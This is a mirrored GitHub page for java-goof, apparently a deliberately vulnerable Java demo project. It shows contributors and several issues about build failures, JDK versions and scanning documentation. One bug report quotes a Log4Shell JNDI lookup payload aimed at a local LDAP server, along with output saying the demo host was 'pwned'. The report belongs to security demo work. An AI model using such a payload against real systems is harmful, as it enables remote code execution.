Giter VIP home page Giter VIP logo

java-goof's Introduction

java-goof's People

Contributors

ah7 avatar artursnyk avatar aviadatsnyk avatar bmvermeer avatar cfereday avatar dogeared avatar ericsmalling avatar fauxfaux avatar fmbenhassine avatar guypod avatar lirantal avatar scott-es avatar sjmaple avatar snyk-bot avatar thetechoddbug avatar vermava avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

java-goof's Issues

Application can't be run

The README.md is exact copy of the original project. As README says go to todolist-web-springmvc but there is no directory is provided with this name. Do I need to run the original application to exploit the vulnerability?

Create terraform for provisioning EKS

For K8s demonstrations, I want to have Terraform configs to:

  1. provision an EKS cluster
  2. restrict the ELB's security group ingress to my home IP address
  3. [optional]set route53 DNS to point goof.${my subdomain} to that ELB

log4shell-server maven build failing in docker build

docker build of log4shell-server failing maven build with:

#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] BUILD FAILURE
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [INFO] Total time:  9.492 s
#8 11.36 [INFO] Finished at: 2022-01-21T20:23:07Z
#8 11.36 [INFO] ------------------------------------------------------------------------
#8 11.36 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-assembly-plugin:2.2-beta-5:single (default-cli) on project log4shell-server: Error reading assemblies: No assembly descriptors found. -> [Help 1]
#8 11.36 [ERROR] 
#8 11.36 [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
#8 11.36 [ERROR] Re-run Maven using the -X switch to enable full debug logging.
#8 11.36 [ERROR] 
#8 11.36 [ERROR] For more information about the errors and possible solutions, please read the following articles:
#8 11.36 [ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
------

[BUG]: JDK 8u191 looks like it's not supported in log4shell-goof. Had to use 8u111, which worked successfully.

Is there an existing issue for this?

  • I have searched the existing issues

Description of the bug

When using 8u191 in directory/project log4shell-goof, I received the following error when running mvn exec:java from client directory (not server):
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.0.0:java (default-cli) on project log4shell-client: An exception occured while executing the Java class.
[ERROR] Unexpected state.
[ERROR] Make sure to remove /tmp/pwned between runs.
[ERROR] Make sure Server is running.
[ERROR] Make sure you JVM is <= 11.0.1 or 8u191 or 7u201 or 6u211

/tmp/pwned didn't exist, the server was running, and I was using JDK version 8u191. I then downgraded to 8u111. I received the success message:

21:35:34.125 [Main.main()] ERROR Main - test
/tmp/pwned DOES NOT EXIST
21:35:34.128 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
/tmp/pwned EXISTS - yah been pwned!

Steps To Reproduce

See above

Additional Information

No response

[FEAT]: Readme instructions for scanning

Is there an existing feature request for this?

  • I have searched the existing feature requests

Description

Customers pull down goof, java goof etc all the time. Need instructions that point to the java scanning documentation and also potentially give scanning instructions, like in the java-goof, it requires all-projects or --maven-aggregate-project. While the CLI intelligently does give hints, some customers are very novice on the technical level (i.e. pure security or managers) and need the help (sometimes it's a language barrier).

Additional Information

No response

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.